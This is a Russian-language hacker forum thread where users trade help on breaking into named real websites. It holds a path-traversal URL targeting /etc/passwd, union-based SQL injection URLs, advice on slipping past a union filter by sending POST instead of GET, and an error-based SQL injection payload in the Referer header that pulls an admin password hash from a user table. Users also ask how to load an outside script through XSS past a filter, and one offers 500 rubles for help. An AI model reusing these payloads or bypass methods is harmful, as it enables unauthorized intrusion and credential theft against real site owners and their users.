Как минимум есть раскрытие путей. Несколько раз повводил отбалдовые запросы и получил вот это: http://www.ctege.info/index.php?option=../../../../.../.../etc/passwd
Зачем мне это гуглить, xss есть, мне просто нужно чтобы скрипт свой можно было подгрузить. В общем кто знает как это сделать стукните в личку даю 500р
Code: select user_id, username, posts from phorum_users where posts > 0 order by posts DESC LIMIT 0,[COLOR=Red][INJECT][/COLOR] Инъекция в LIMIT при использовании конструкции ORDER BY. Вывод - никак не раскрутишь.
Как в таком запросе: http://www.miamacdonald.com/a.php?id=-42%20union%20select%201,version(),3,4,5,6%20-- вместо version() вывести произвольную строку? Заранее благодарен.
SQLi там есть, но раскрутить ее у меня не получилось, ибо строка запроса тупо попадает в условие запроса. Кто-то более опытный, может быть, сможет что-то выжать.
Помогите раскрутить http://tonnel.ru/?l=recept&recept=obich&idi=193' И еще такой вопрос. Как обойти фильтрацию FROM ? стандарто не получается
по первому вопросу: запрос фильтруется по union, когда передаёшь гетом(возможно ещё что-то, но пофиг). Скрипт принимает пост так же как и гет, только не фильтрует данные (или же хост сам фильтрует только гет на юнионы и пр.). Шлёшь на http://tonnel.ru/ l=recept&recept=obich&idi=-193' union select 1,(select table_name from information_schema.tables limit 1),3,4,5,6,7,8,9-- 2. смотря как фильтруется, может и саму фильтрацию просто можно обойти.
Всем привет, есть короче сайт со sqli в referer, но когда вывожу пароль админа, то не хватает одного символа в хэше md5 вот так запрашиваю: Referer: 1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,Hex(cast(dle_users.password as char)),0x27,0x7e) FROM `slidem`.dle_users LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 И вот че пишут: 63303161616237343161363064663039313866363861346434303137623331 Если расшифровать то будет c01aab741a60df0918f68a4d4017b31 31 символ - 1 не хватает. Как вывести весь пароль?
PHP: 1' and(select 1 from(select count(*),mid((select unhex(hex(cast(password as char))) from `slidem`.dle_users limit 0,1),rand(0)|0,64)x from information_schema.tables group by x)a) and '1'='1
Помогите раскрутить. http://www.guljan.info/news/2012/October/2707?page=%27+OR+1=1/* По-моему, параметр page в коде просто приводится к целому числу и вставляется ...desc limit {$page}-12, 12.... Но я могу ошибаться.
_ttp://www.guljan.info/news/2012/October/2707?page=-2 Вектор атаки невозможен по причине выделенной выше
Помогите раскрутить: Code: _ttp://w ww.knightarmco.com/shop/ index.php?keyword=5&main_page=advanced_search_result&search_in_description=1 параметр keyword уязвим... чёт у меня ничего не получается...
Ребят есть активная XSS. Имеется фильтр на слово script. Нужно подгрузить свой js файл. Нужна альтернатива <script src=>